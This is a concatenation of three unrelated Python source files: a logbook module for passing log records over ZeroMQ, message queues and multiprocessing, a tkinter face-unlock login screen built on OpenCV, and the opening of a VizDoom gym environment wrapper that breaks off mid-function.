    The queue will be filled with JSON exported log records. To receive such
    log records from a queue you can use the :class:`ZeroMQSubscriber`.

    If `multi` is set to `True`, the handler will use a `PUSH` socket to
    publish the records. This allows multiple handlers to use the same `uri`.
    The records can be received by using the :class:`ZeroMQSubscriber` with
    `multi` set to `True`.

    Example setup::

        handler = ZeroMQHandler('tcp://127.0.0.1:5000')
    """

    def __init__(self, uri=None, level=NOTSET, filter=None, bubble=False,
                 context=None, multi=False):
        Handler.__init__(self, level, filter, bubble)
        try:
            import zmq
        except ImportError:
            raise RuntimeError('The pyzmq library is required for '
                               'the ZeroMQHandler.')
        #: the zero mq context
        self.context = context or zmq.Context()
        if multi:
            #: the zero mq socket.
            self.socket = self.context.socket(zmq.PUSH)
            # PUSH *connects* so several handlers can feed one PULL side.
            if uri is not None:
                self.socket.connect(uri)
        else:
            #: the zero mq socket.
            self.socket = self.context.socket(zmq.PUB)
            # PUB *binds*; subscribers connect to this endpoint.
            if uri is not None:
                self.socket.bind(uri)

    def export_record(self, record):
        """Exports the record into a dictionary ready for JSON dumping."""
        return record.to_dict(json_safe=True)

    def emit(self, record):
        # Records travel on the wire as UTF-8 encoded JSON.
        self.socket.send(json.dumps(
            self.export_record(record)).encode("utf-8"))

    def close(self, linger=-1):
        self.socket.close(linger)

    def __del__(self):
        # When the Handler is deleted we must close our socket in a
        # non-blocking fashion (using linger).
        # Otherwise it can block indefinitely, for example if the Subscriber is
        # not reachable.
        # If messages are pending on the socket, we wait 100ms for them to be
        # sent then we discard them.
        self.close(linger=100)
class ThreadController(object):
    """Runs a subscriber's dispatch loop on a daemonized worker thread.

    Usually created and started in one go by
    :meth:`~logbook.queues.ZeroMQSubscriber.dispatch_in_background` or a
    comparable function.
    """

    def __init__(self, subscriber, setup=None):
        self.subscriber = subscriber
        self.setup = setup
        self._thread = None
        self.running = False

    def start(self):
        """Starts the task thread."""
        self.running = True
        worker = Thread(target=self._target)
        worker.setDaemon(True)
        worker.start()
        self._thread = worker

    def stop(self):
        """Stops the task thread."""
        if not self.running:
            return
        self.running = False
        self._thread.join()
        self._thread = None

    def _target(self):
        # Push the optional handler setup onto this thread's stack for the
        # lifetime of the loop; the matching pop happens in ``finally``.
        if self.setup is not None:
            self.setup.push_thread()
        try:
            while self.running:
                self.subscriber.dispatch_once(timeout=0.05)
        finally:
            if self.setup is not None:
                self.setup.pop_thread()
class SubscriberBase(object):
    """Baseclass for all subscribers."""

    def recv(self, timeout=None):
        """Receives a single record from the socket.  Timeout of 0 means
        nonblocking, `None` means blocking and otherwise it's a timeout in
        seconds after which the function just returns with `None`.

        Subclasses have to override this.
        """
        raise NotImplementedError()

    def dispatch_once(self, timeout=None):
        """Receives one record from the socket, loads it and dispatches it.

        Returns `True` if something was dispatched or `False` if it timed
        out.
        """
        record = self.recv(timeout)
        if record is None:
            return False
        dispatch_record(record)
        return True

    def dispatch_forever(self):
        """Starts a loop that dispatches log records forever."""
        while True:
            self.dispatch_once()

    def dispatch_in_background(self, setup=None):
        """Starts a new daemonized thread that dispatches in the background.
        An optional handler setup can be provided that pushed to the new
        thread (can be any :class:`logbook.base.StackedObject`).

        Returns a :class:`ThreadController` object for shutting down
        the background thread.  The background thread will already be
        running when this function returns.
        """
        controller = ThreadController(self, setup)
        controller.start()
        return controller
class MessageQueueSubscriber(SubscriberBase):
    """A helper that acts as a message queue subscriber and will dispatch
    received log records to the active handler setup. There are multiple ways
    to use this class.

    It can be used to receive log records from a queue::

        subscriber = MessageQueueSubscriber('mongodb://localhost:27017/logging')
        record = subscriber.recv()

    But it can also be used to receive and dispatch these in one go::

        with target_handler:
            subscriber = MessageQueueSubscriber('mongodb://localhost:27017/logging')
            subscriber.dispatch_forever()

    This will take all the log records from that queue and dispatch them
    over to `target_handler`. If you want you can also do that in the
    background::

        subscriber = MessageQueueSubscriber('mongodb://localhost:27017/logging')
        controller = subscriber.dispatch_in_background(target_handler)

    The controller returned can be used to shut down the background
    thread::

        controller.stop()
    """
    def __init__(self, uri=None, queue='logging'):
        try:
            import kombu
        except ImportError:
            raise RuntimeError('The kombu library is required.')
        if uri:
            connection = kombu.Connection(uri)

        # NOTE(review): when ``uri`` is falsy, ``connection`` is unbound and
        # this raises UnboundLocalError — confirm intended.
        self.queue = connection.SimpleQueue(queue)

    def __del__(self):
        try:
            self.close()
        except AttributeError:
            # subscriber partially created
            pass

    def close(self):
        self.queue.close()

    def recv(self, timeout=None):
        """Receives a single record from the socket. Timeout of 0 means
        nonblocking, `None` means blocking and otherwise it's a timeout in
        seconds after which the function just returns with `None`.
        """
        if timeout == 0:
            try:
                rv = self.queue.get(block=False)
            except Exception:
                # Nonblocking poll: treat "no message" (or any backend
                # hiccup) as a timeout and return None.
                return
        else:
            rv = self.queue.get(timeout=timeout)

        log_record = rv.payload
        # Acknowledge receipt so the broker can discard the message.
        rv.ack()

        return LogRecord.from_dict(log_record)
RabbitMQSubscriber = MessageQueueSubscriber
class ZeroMQSubscriber(SubscriberBase):
    """A helper that acts as ZeroMQ subscriber and will dispatch received
    log records to the active handler setup. There are multiple ways to
    use this class.

    It can be used to receive log records from a queue::

        subscriber = ZeroMQSubscriber('tcp://127.0.0.1:5000')
        record = subscriber.recv()

    But it can also be used to receive and dispatch these in one go::

        with target_handler:
            subscriber = ZeroMQSubscriber('tcp://127.0.0.1:5000')
            subscriber.dispatch_forever()

    This will take all the log records from that queue and dispatch them
    over to `target_handler`. If you want you can also do that in the
    background::

        subscriber = ZeroMQSubscriber('tcp://127.0.0.1:5000')
        controller = subscriber.dispatch_in_background(target_handler)

    The controller returned can be used to shut down the background
    thread::

        controller.stop()

    If `multi` is set to `True`, the subscriber will use a `PULL` socket
    and listen to records published by a `PUSH` socket (usually via a
    :class:`ZeroMQHandler` with `multi` set to `True`). This allows a
    single subscriber to dispatch multiple handlers.
    """

    def __init__(self, uri=None, context=None, multi=False):
        try:
            import zmq
        except ImportError:
            raise RuntimeError('The pyzmq library is required for '
                               'the ZeroMQSubscriber.')
        # Keep the module around for NOBLOCK/select in recv().
        self._zmq = zmq

        #: the zero mq context
        self.context = context or zmq.Context()
        if multi:
            #: the zero mq socket.
            self.socket = self.context.socket(zmq.PULL)
            # PULL binds; many PUSH handlers connect to it.
            if uri is not None:
                self.socket.bind(uri)
        else:
            #: the zero mq socket.
            self.socket = self.context.socket(zmq.SUB)
            if uri is not None:
                self.socket.connect(uri)
            # Subscribe to every topic (empty prefix filter).
            self.socket.setsockopt_unicode(zmq.SUBSCRIBE, u(''))

    def __del__(self):
        try:
            self.close()
        except AttributeError:
            # subscriber partially created
            pass

    def close(self):
        """Closes the zero mq socket."""
        self.socket.close()

    def recv(self, timeout=None):
        """Receives a single record from the socket. Timeout of 0 means
        nonblocking, `None` means blocking and otherwise it's a timeout in
        seconds after which the function just returns with `None`.
        """
        if timeout is None:
            rv = self.socket.recv()
        elif not timeout:
            rv = self.socket.recv(self._zmq.NOBLOCK)
            # NOTE(review): pyzmq normally raises zmq.Again on NOBLOCK with
            # no message rather than returning None — confirm this path.
            if rv is None:
                return
        else:
            # Wait for readability, then do a non-blocking receive.
            if not self._zmq.select([self.socket], [], [], timeout)[0]:
                return
            rv = self.socket.recv(self._zmq.NOBLOCK)
        if not PY2:
            rv = rv.decode("utf-8")
        return LogRecord.from_dict(json.loads(rv))
def _fix_261_mplog():
"""necessary for older python's to disable a broken monkeypatch
in the logging module. See multiprocessing/util.py for the
hasattr() check. At least in Python 2.6.1 the multiprocessing
module is not imported by logging and as such the test in
the util fails.
"""
import logging
import multiprocessing
logging.multiprocessing = multiprocessing
class MultiProcessingHandler(Handler):
    """Implements a handler that dispatches over a queue to a different
    process.  It is connected to a subscriber with a
    :class:`multiprocessing.Queue`::

        from multiprocessing import Queue
        from logbook.queues import MultiProcessingHandler
        queue = Queue(-1)
        handler = MultiProcessingHandler(queue)
    """

    def __init__(self, queue, level=NOTSET, filter=None, bubble=False):
        Handler.__init__(self, level, filter, bubble)
        self.queue = queue
        # Work around the broken logging monkeypatch on old Pythons.
        _fix_261_mplog()

    def emit(self, record):
        # JSON-safe dict so the record can cross the process boundary;
        # put_nowait avoids blocking the logging call.
        self.queue.put_nowait(record.to_dict(json_safe=True))
class MultiProcessingSubscriber(SubscriberBase):
    """Receives log records from the given multiprocessing queue and
    dispatches them to the active handler setup. Make sure to use the same
    queue for both handler and subscriber. Ideally the queue is set
    up with maximum size (``-1``)::

        from multiprocessing import Queue
        queue = Queue(-1)

    It can be used to receive log records from a queue::

        subscriber = MultiProcessingSubscriber(queue)
        record = subscriber.recv()

    But it can also be used to receive and dispatch these in one go::

        with target_handler:
            subscriber = MultiProcessingSubscriber(queue)
            subscriber.dispatch_forever()

    This will take all the log records from that queue and dispatch them
    over to `target_handler`. If you want you can also do that in the
    background::

        subscriber = MultiProcessingSubscriber(queue)
        controller = subscriber.dispatch_in_background(target_handler)

    The controller returned can be used to shut down the background
    thread::

        controller.stop()

    If no queue is provided the subscriber will create one. This one can
    then be used by handlers::

        subscriber = MultiProcessingSubscriber()
        handler = MultiProcessingHandler(subscriber.queue)
    """

    def __init__(self, queue=None):
        if queue is None:
            from multiprocessing import Queue
            queue = Queue(-1)
        self.queue = queue
        # Work around the broken logging monkeypatch on old Pythons.
        _fix_261_mplog()

    def recv(self, timeout=None):
        # Blocking get when no timeout is given; otherwise map a queue
        # timeout to the documented ``None`` return value.
        if timeout is None:
            rv = self.queue.get()
        else:
            try:
                rv = self.queue.get(block=True, timeout=timeout)
            except Empty:
                return None
        return LogRecord.from_dict(rv)
class ExecnetChannelHandler(Handler):
    """Implements a handler that dispatches over an execnet channel
    to a different process.
    """

    def __init__(self, channel, level=NOTSET, filter=None, bubble=False):
        Handler.__init__(self, level, filter, bubble)
        self.channel = channel

    def emit(self, record):
        # JSON-safe dict so the record survives channel serialization.
        self.channel.send(record.to_dict(json_safe=True))
class ExecnetChannelSubscriber(SubscriberBase):
    """Subscribes to an execnet channel."""

    def __init__(self, channel):
        self.channel = channel

    def recv(self, timeout=None):
        """Receive one record dict from the channel; ``None`` on timeout,
        EOF or a remote error.
        """
        try:
            rv = self.channel.receive(timeout=timeout)
        except self.channel.RemoteError:
            # XXX: handle
            return None
        except (self.channel.TimeoutError, EOFError):
            return None
        else:
            return LogRecord.from_dict(rv)
class TWHThreadController(object):
    """Pulls records off a queue and feeds them to a handler.

    Queue and handler are both taken from the
    :class:`ThreadedWrapperHandler` passed in; a private sentinel object
    asks the worker thread to shut down.
    """

    _sentinel = object()

    def __init__(self, wrapper_handler):
        self.wrapper_handler = wrapper_handler
        self._thread = None
        self.running = False

    def start(self):
        """Starts the task thread."""
        self.running = True
        worker = Thread(target=self._target)
        worker.setDaemon(True)
        worker.start()
        self._thread = worker

    def stop(self):
        """Stops the task thread."""
        if not self.running:
            return
        # The sentinel travels through the queue behind any pending
        # records, so everything already enqueued is still handled.
        self.wrapper_handler.queue.put_nowait(self._sentinel)
        self._thread.join()
        self._thread = None

    def _target(self):
        while True:
            record = self.wrapper_handler.queue.get()
            if record is self._sentinel:
                self.running = False
                break
            self.wrapper_handler.handler.handle(record)
class ThreadedWrapperHandler(WrapperHandler):
    """This handled uses a single background thread to dispatch log records
    to a specific other handler using an internal queue. The idea is that if
    you are using a handler that requires some time to hand off the log records
    (such as the mail handler) and would block your request, you can let
    Logbook do that in a background thread.

    The threaded wrapper handler will automatically adopt the methods and
    properties of the wrapped handler. All the values will be reflected:

    >>> twh = ThreadedWrapperHandler(TestHandler())
    >>> from logbook import WARNING
    >>> twh.level_name = 'WARNING'
    >>> twh.handler.level_name
    'WARNING'
    """
    # Attributes served by this class itself; everything else is proxied
    # to the wrapped handler by WrapperHandler.
    _direct_attrs = frozenset(['handler', 'queue', 'controller'])

    def __init__(self, handler, maxsize=0):
        WrapperHandler.__init__(self, handler)
        self.queue = ThreadQueue(maxsize)
        self.controller = TWHThreadController(self)
        self.controller.start()

    def close(self):
        # Drain and stop the worker thread before closing the real handler.
        self.controller.stop()
        self.handler.close()

    def emit(self, record):
        try:
            self.queue.put_nowait(record)
        except Full:
            # silently drop records when the bounded queue is full
            pass
class GroupMember(ThreadController):
    # One member of a SubscriberGroup: forwards every record received by
    # its subscriber into the group's shared queue on a background thread.
    def __init__(self, subscriber, queue):
        ThreadController.__init__(self, subscriber, None)
        self.queue = queue

    def _target(self):
        if self.setup is not None:
            self.setup.push_thread()
        try:
            while self.running:
                record = self.subscriber.recv()
                if record:
                    try:
                        # Short timeout keeps the loop responsive to stop();
                        # if the group's queue stays full the record is
                        # deliberately dropped.
                        self.queue.put(record, timeout=0.05)
                    except Full:
                        pass
        finally:
            if self.setup is not None:
                self.setup.pop_thread()
class SubscriberGroup(SubscriberBase):
    """This is a subscriber which represents a group of subscribers.

    This is helpful if you are writing a server-like application which has
    "slaves". This way a user is easily able to view every log record which
    happened somewhere in the entire system without having to check every
    single slave::

        subscribers = SubscriberGroup([
            MultiProcessingSubscriber(queue),
            ZeroMQSubscriber('tcp://127.0.0.1:5000')
        ])
        with target_handler:
            subscribers.dispatch_forever()
    """
    def __init__(self, subscribers=None, queue_limit=10):
        self.members = []
        self.queue = ThreadQueue(queue_limit)
        for subscriber in subscribers or []:
            self.add(subscriber)

    def add(self, subscriber):
        """Adds the given `subscriber` to the group."""
        member = GroupMember(subscriber, self.queue)
        member.start()
        self.members.append(member)

    def recv(self, timeout=None):
        # Pull the next record any member forwarded; None on timeout.
        try:
            return self.queue.get(timeout=timeout)
        except Empty:
            return

    def stop(self):
        """Stops the group from internally receiving any more messages, once
        the internal queue is exhausted :meth:`recv` will always return `None`.
        """
        # BUG FIX: the loop previously called ``self.member.stop()`` which
        # raised AttributeError on the first iteration (``self.member`` does
        # not exist); each iterated *member* must be stopped instead.
        for member in self.members:
            member.stop()
|
SECURITY.py | from tkinter import *
from PIL import Image, ImageTk
import cv2
import numpy as np
import os
from os.path import isfile, join
from threading import Thread
from userHandler import UserData
import FACE_UNLOCKER as FU
background, textColor = 'white', 'black'
face_classifier = cv2.CascadeClassifier('Cascade/haarcascade_frontalface_default.xml')
if os.path.exists('userData')==False:
os.mkdir('userData')
if os.path.exists('userData/faceData')==False:
os.mkdir('userData/faceData')
###### ROOT1 ########
def startLogin():
    """Run the face-unlock flow and, on success, switch the UI to root3.

    On a positive detection the stored user profile is loaded and the
    welcome labels / lock indicators are updated with the user's first
    name.  All errors are printed rather than raised (GUI context).
    """
    try:
        result = FU.startDetecting()
        if result:
            user = UserData()
            user.extractData()
            # First word of the stored full name.
            userName = user.getName().split()[0]
            welcLbl['text'] = 'Hi '+userName+',\nWelcome to the world of\nScience & Technology'
            # NOTE(review): ``Lbl`` is not defined in the visible UI setup —
            # presumably created later in the file; verify it exists.
            Lbl['text'] = 'Hi '+userName+',\nWelcome to the world of\nScience & Technology'
            loginStatus['text'] = 'UNLOCKED'
            loginStatus['fg'] = 'green'
            faceStatus['text']='(Logged In)'
            raise_frame(root3)
        else:
            print('Error Occurred')
    except Exception as e:
        print(e)
####### ROOT2 ########
def trainFace():
    """Train an LBPH face recognizer on all captured face images.

    Reads every image in userData/faceData/ as grayscale, labels each file
    by its index, trains cv2's LBPH model and saves the result to
    userData/trainer.yml.
    """
    data_path = 'userData/faceData/'
    onlyfiles = [f for f in os.listdir(data_path) if isfile(join(data_path, f))]
    Training_data = []
    Labels = []
    for i, files in enumerate(onlyfiles):
        image_path = data_path + onlyfiles[i]
        images = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)
        Training_data.append(np.asarray(images, dtype=np.uint8))
        Labels.append(i)
    Labels = np.asarray(Labels, dtype=np.int32)
    model = cv2.face.LBPHFaceRecognizer_create()
    model.train(np.asarray(Training_data), np.asarray(Labels))
    print('Model Trained Successfully !!!')
    model.save('userData/trainer.yml')
    print('Model Saved !!!')
def face_extractor(img):
    """Return the last detected face in *img* cropped out, or ``None``.

    Converts the BGR frame to grayscale, runs the Haar cascade, and
    returns the crop (in original colors) of the final detection.
    """
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    faces = face_classifier.detectMultiScale(gray, 1.3, 5)
    # BUG FIX: the original ``if faces is ():`` compared identity against a
    # fresh tuple literal — semantically wrong (SyntaxWarning on 3.8+) and
    # never true for an empty ndarray; test for emptiness instead.
    if len(faces) == 0:
        return None
    cropped_face = None
    for (x, y, w, h) in faces:
        cropped_face = img[y:y+h, x:x+w]
    return cropped_face
cap = cv2.VideoCapture(0)
count = 0
def startCapturing():
    """Capture one webcam frame, save a detected face, and reschedule.

    Runs as a tkinter ``after`` loop: each tick grabs a frame, saves a
    200x200 grayscale face crop (up to 100 images) into userData/faceData/,
    updates the live preview label, and schedules itself again in 10 ms.
    Once 100 faces are collected the camera is released and trainFace()
    is invoked.
    """
    global count
    ret, frame = cap.read()
    if face_extractor(frame) is not None:
        count += 1
        face = cv2.resize(face_extractor(frame), (200, 200))
        face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)
        file_name_path = 'userData/faceData/img' + str(count) + '.png'
        cv2.imwrite(file_name_path, face)
        print(count)
        progressLbl['text'] = 'Progress ' + str(count) + '%'
        cv2.putText(face, str(count), (50, 50), cv2.FONT_HERSHEY_COMPLEX, 1, (0,255,0), 2)
    else:
        progressLbl['text'] = 'Face Not Clear'
    if count==100:
        # Capture complete: restore the placeholder image and train.
        lmain['image'] = defaultImg2
        statusLbl['text'] = '(Face added successfully)'
        cap.release()
        cv2.destroyAllWindows()
        trainFace()
        return
    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
    frame = cv2.flip(frame, 1)
    img = Image.fromarray(frame)
    imgtk = ImageTk.PhotoImage(image=img)
    # Keep a reference on the label so the PhotoImage is not garbage
    # collected before tkinter draws it.
    lmain.imgtk = imgtk
    lmain.configure(image=imgtk)
    lmain.after(10, startCapturing)
def Add_Face():
    """Validate the name/gender form, then start face capture and persist
    the user's details via UserData.
    """
    user = nameField.get()
    gender = r.get()
    # BUG FIX: the original ``user is not ''`` compared object identity
    # with a string literal (unreliable, SyntaxWarning on 3.8+); value
    # comparison is what is meant here.
    if user != '' and gender != 0:
        startCapturing()
        statusLbl['text'] = ''
        # Radio value 1 = Male, 2 = Female.
        gen = 'Male'
        if gender == 2:
            gen = 'Female'
        u = UserData()
        u.updateData(user, gen)
    else:
        statusLbl['text'] = '(Please fill the details)'
def raise_frame(frame):
    """Bring *frame* to the top of the widget stacking order."""
    frame.tkraise()
if __name__ == '__main__':
    root = Tk()
    root.title('ASSISTANT')
    root.geometry('350x600')
    root.configure(bg=background)
    # Three stacked screens sharing the same grid cell; raise_frame() switches
    # between them: root1 = main menu, root2 = face registration, root3 = chat.
    root1 = Frame(root, bg=background)
    root2 = Frame(root, bg=background)
    root3 = Frame(root, bg=background)
    for f in (root1, root2, root3):
        f.grid(row=0, column=0, sticky='news')
    ################################
    ######## MAIN SCREEN   #########
    ################################
    image1 = Image.open('images/menu.jpg')
    defaultImg1 = ImageTk.PhotoImage(image1)
    dataFrame1 = Frame(root1, bd=10, bg=background)
    dataFrame1.pack()
    logo = Label(dataFrame1, width=300, height=250, image=defaultImg1)
    logo.pack(padx=10, pady=10)
    # welcome label
    welcLbl = Label(root1, text='Hi there,\nWelcome to the world of\nScience & Technology', font=('Arial', 15), fg=textColor, bg=background)
    welcLbl.pack(padx=10, pady=20)
    # add face
    loginStatus = Label(root1, text='LOCKED', font=('Arial Bold', 15), bg=background, fg='red')
    loginStatus.pack(pady=(50,0))
    # If no trained model exists yet, offer face registration; otherwise start
    # the face-login thread in the background (startLogin defined elsewhere).
    if os.path.exists('userData/trainer.yml')==False:
        loginStatus['text'] = 'Your Face is not registered'
        addFace = Button(root1, text='Add Face', font=('Arial', 12), bg='blue', fg='white', command=lambda:raise_frame(root2))
        addFace.pack(ipadx=10)
    else:
        Thread(target=startLogin).start()
    # status of add face
    faceStatus = Label(root1, text='(Face Not Detected)', font=('Arial 10'), fg=textColor, bg=background)
    faceStatus.pack(pady=5)
    ##################################
    ######## FACE ADD SCREEN   #######
    ##################################
    image2 = Image.open('images/defaultFace2.jpg')
    defaultImg2 = ImageTk.PhotoImage(image2)
    dataFrame2 = Frame(root2, bd=10, bg=background)
    dataFrame2.pack(fill=X)
    # lmain shows the live webcam preview during capture (see startCapturing).
    lmain = Label(dataFrame2, width=300, height=250, image=defaultImg2)
    lmain.pack(padx=10, pady=10)
    # Details
    detailFrame2 = Frame(root2, bd=10, bg=background)
    detailFrame2.pack(fill=X)
    userFrame2 = Frame(detailFrame2, bd=10, width=300, height=250, relief=FLAT, bg=background)
    userFrame2.pack(padx=10, pady=10)
    # progress
    progressLbl = Label(dataFrame2, text='', font=('Arial Bold', 10), bg=background, fg=textColor)
    progressLbl.place(x=120, y=265)
    # name
    nameLbl = Label(userFrame2, text='Name', font=('Arial Bold', 12), fg=textColor, bg=background)
    nameLbl.place(x=10,y=10)
    nameField = Entry(userFrame2, bd=5, font=('Arial 10'), width=25)
    nameField.focus()
    nameField.place(x=80,y=10)
    genLbl = Label(userFrame2, text='Gender', font=('Arial Bold', 12), fg=textColor, bg=background)
    genLbl.place(x=10,y=50)
    # gender selection: 0 = unset, 1 = male, 2 = female (read by Add_Face)
    r = IntVar()
    genMale = Radiobutton(userFrame2, text='Male' ,font=('Arial 10'), value=1, bg=background, fg=textColor, variable=r)
    genMale.place(x=80,y=50)
    genFemale = Radiobutton(userFrame2, text='Female' ,font=('Arial 10'), value=2, bg=background, fg=textColor, variable=r)
    genFemale.place(x=180,y=50)
    # agreement (NOTE(review): checkbox state is never read anywhere visible)
    agree = Checkbutton(userFrame2, text='I agree to use my face for Security purpose', fg=textColor, bg=background)
    agree.place(x=30, y=100)
    # add face
    addBtn = Button(userFrame2, text='Add Face', font=('Arial Bold', 12), bg='green', fg='white', command=Add_Face)
    addBtn.place(x=100, y=150)
    # status of add face
    statusLbl = Label(userFrame2, text='', font=('Arial 10'), fg=textColor, bg=background)
    statusLbl.place(x=60, y=190)
    ###########################
    ####### CHAT SCREEN #######
    ###########################
    image3 = Image.open('images/back.jpg')
    defaultImg3 = ImageTk.PhotoImage(image3)
    dataFrame3 = Frame(root3, bd=10, bg=background)
    dataFrame3.pack()
    img = Label(dataFrame3, width=300, height=250, image=defaultImg3)
    img.pack(padx=10, pady=10)
    # welcome label
    Lbl = Label(root3, text="Hi, I'm your personal assistant", font=('Arial', 15), fg=textColor, bg=background)
    Lbl.pack(padx=10, pady=20)
    raise_frame(root1)
    root.mainloop()
|
doom_gym.py | import copy
import os
import random
import re
import time
from os.path import join
from threading import Thread
import cv2
import gym
import numpy as np
from filelock import FileLock, Timeout
from gym.utils import seeding
from vizdoom.vizdoom import ScreenResolution, DoomGame, Mode, AutomapMode
from algorithms.utils.spaces.discretized import Discretized
from utils.utils import log, project_tmp_dir
def doom_lock_file(max_parallel):
    """Pick one of ``max_parallel`` shared lock-file paths at random.

    Doom instances tend to have problems starting when a lot of them are
    initialized in parallel (the sweet spot is about 5-10 at once); once the
    envs are initialized this is not a problem.  File locking limits how many
    envs initialize simultaneously, which matters most for multiplayer envs,
    and also works across completely independent process groups
    (e.g. different experiments).
    """
    slot = random.randrange(0, max_parallel)
    return join(project_tmp_dir(), f'doom_{slot:03d}.lockfile')
def key_to_action_default(key):
    """Map a pynput key to a default discrete action index (health gathering).

    Only the four arrow keys are bound; any other key yields None.  The full
    button set available in the scenarios includes:
    MOVE_FORWARD
    MOVE_BACKWARD
    MOVE_RIGHT
    MOVE_LEFT
    SELECT_WEAPON1
    SELECT_WEAPON2
    SELECT_WEAPON3
    SELECT_WEAPON4
    SELECT_WEAPON5
    SELECT_WEAPON6
    SELECT_WEAPON7
    ATTACK
    SPEED
    TURN_LEFT_RIGHT_DELTA
    """
    from pynput.keyboard import Key

    # health gathering bindings
    action_table = {
        Key.left: 0,
        Key.right: 1,
        Key.up: 2,
        Key.down: 3,
    }
    return action_table.get(key)
class VizdoomEnv(gym.Env):
    """Gym wrapper around a single-player VizDoom game instance.

    Handles game creation/initialization (with optional file-locking to limit
    concurrent init), action-space flattening for Doom, optional top-down
    automap rendering, positional-coverage histograms, demo recording/replay
    and interactive human play.
    """

    def __init__(self,
                 action_space,
                 config_file,
                 coord_limits=None,
                 max_histogram_length=200,
                 show_automap=False,
                 skip_frames=1,
                 async_mode=False,
                 record_to=None):
        """
        :param action_space: gym action space (possibly composite, see _convert_actions)
        :param config_file: scenario .cfg filename, resolved under ./scenarios
        :param coord_limits: (x0, y0, x1, y1) map bounds; enables visitation histograms
        :param max_histogram_length: longest side of the histogram grid
        :param show_automap: enable the engine's top-down automap buffer
        :param skip_frames: frames to repeat each action for
        :param async_mode: ASYNC_PLAYER mode (testing only, slower)
        :param record_to: directory for .lmp episode demos (single-player only)
        """
        self.initialized = False

        # essential game data
        self.game = None
        self.state = None
        self.curr_seed = 0
        self.rng = None
        self.skip_frames = skip_frames
        self.async_mode = async_mode

        # optional - for topdown view rendering and visitation heatmaps
        self.show_automap = show_automap
        self.coord_limits = coord_limits

        # can be adjusted after the environment is created (but before any reset() call) via observation space wrapper
        self.screen_w, self.screen_h, self.channels = 640, 480, 3
        self.screen_resolution = ScreenResolution.RES_640X480
        self.calc_observation_space()
        self.black_screen = None

        # provided as a part of environment definition, since these depend on the scenario and
        # can be quite complex multi-discrete spaces
        self.action_space = action_space
        self.composite_action_space = hasattr(self.action_space, 'spaces')
        self.delta_actions_scaling_factor = 7.5

        scenarios_dir = join(os.path.dirname(__file__), 'scenarios')
        self.config_path = join(scenarios_dir, config_file)
        self.variable_indices = self._parse_variable_indices(self.config_path)

        # only created if we call render() method
        self.viewer = None

        # record full episodes using VizDoom recording functionality
        self.record_to = record_to
        self.is_multiplayer = False  # overridden in derived classes

        # (optional) histogram to track positional coverage
        # do not pass coord_limits if you don't need this, to avoid extra calculation
        self.max_histogram_length = max_histogram_length
        self.current_histogram, self.previous_histogram = None, None
        if self.coord_limits:
            x = (self.coord_limits[2] - self.coord_limits[0])
            y = (self.coord_limits[3] - self.coord_limits[1])
            if x > y:
                len_x = self.max_histogram_length
                len_y = int((y / x) * self.max_histogram_length)
            else:
                len_x = int((x / y) * self.max_histogram_length)
                len_y = self.max_histogram_length
            self.current_histogram = np.zeros((len_x, len_y), dtype=np.int32)
            self.previous_histogram = np.zeros_like(self.current_histogram)

        # helpers for human play with pynput keyboard input
        self._terminate = False
        self._current_actions = []
        self._actions_flattened = None

        self._prev_info = None
        self._last_episode_info = None

        self._num_episodes = 0

        self.mode = 'algo'

        self.seed()

    def seed(self, seed=None):
        """Seed the env RNG; returns [seed, rng] (old gym seeding convention)."""
        self.curr_seed = seeding.hash_seed(seed, max_bytes=4)
        self.rng, _ = seeding.np_random(seed=self.curr_seed)
        return [self.curr_seed, self.rng]

    def calc_observation_space(self):
        """(Re)build the HxWxC uint8 image observation space."""
        self.observation_space = gym.spaces.Box(0, 255, (self.screen_h, self.screen_w, self.channels), dtype=np.uint8)

    def _set_game_mode(self, mode):
        """Select the VizDoom engine mode for 'replay'/'human'/'algo' operation."""
        if mode == 'replay':
            self.game.set_mode(Mode.PLAYER)
        else:
            if self.async_mode:
                log.info('Starting in async mode! Use this only for testing, otherwise PLAYER mode is much faster')
                self.game.set_mode(Mode.ASYNC_PLAYER)
            else:
                self.game.set_mode(Mode.PLAYER)

    def _create_doom_game(self, mode):
        """Instantiate DoomGame, load the scenario config and set window/mode."""
        self.game = DoomGame()

        self.game.load_config(self.config_path)
        self.game.set_screen_resolution(self.screen_resolution)
        self.game.set_seed(self.rng.randint(0, 2**32 - 1))

        if mode == 'algo':
            self.game.set_window_visible(False)
        elif mode == 'human' or mode == 'replay':
            self.game.add_game_args('+freelook 1')
            self.game.set_window_visible(True)
        else:
            raise Exception('Unsupported mode')

        self._set_game_mode(mode)

    def _game_init(self, with_locking=True, max_parallel=10):
        """Call game.init(), optionally serialized through a shared file lock.

        Retries indefinitely on lock Timeout; any other init failure is
        escalated as EnvCriticalError (the process should terminate).
        """
        lock_file = lock = None
        if with_locking:
            lock_file = doom_lock_file(max_parallel)
            lock = FileLock(lock_file)

        init_attempt = 0
        while True:
            init_attempt += 1
            try:
                if with_locking:
                    with lock.acquire(timeout=20):
                        self.game.init()
                else:
                    self.game.init()
                break
            except Timeout:
                if with_locking:
                    log.debug(
                        'Another process currently holds the lock %s, attempt: %d', lock_file, init_attempt,
                    )
            except Exception as exc:
                log.warning('VizDoom game.init() threw an exception %r. Terminate process...', exc)
                from envs.env_utils import EnvCriticalError
                raise EnvCriticalError()

    def initialize(self):
        """Create and init the game; configure the automap if requested."""
        self._create_doom_game(self.mode)

        # (optional) top-down view provided by the game engine
        if self.show_automap:
            self.game.set_automap_buffer_enabled(True)
            self.game.set_automap_mode(AutomapMode.OBJECTS)
            self.game.set_automap_rotate(False)
            self.game.set_automap_render_textures(False)

            # self.game.add_game_args("+am_restorecolors")
            # self.game.add_game_args("+am_followplayer 1")
            background_color = 'ffffff'
            self.game.add_game_args('+viz_am_center 1')
            self.game.add_game_args('+am_backcolor ' + background_color)
            self.game.add_game_args('+am_tswallcolor dddddd')
            # self.game.add_game_args("+am_showthingsprites 0")
            self.game.add_game_args('+am_yourcolor ' + background_color)
            self.game.add_game_args('+am_cheat 0')
            self.game.add_game_args('+am_thingcolor 0000ff')  # player color
            self.game.add_game_args('+am_thingcolor_item 00ff00')
            # self.game.add_game_args("+am_thingcolor_citem 00ff00")

        self._game_init()
        self.initialized = True

    def _ensure_initialized(self):
        if not self.initialized:
            self.initialize()

    @staticmethod
    def _parse_variable_indices(config):
        """Parse the scenario .cfg and map each available_game_variable name
        to its index in state.game_variables."""
        with open(config, 'r') as config_file:
            lines = config_file.readlines()
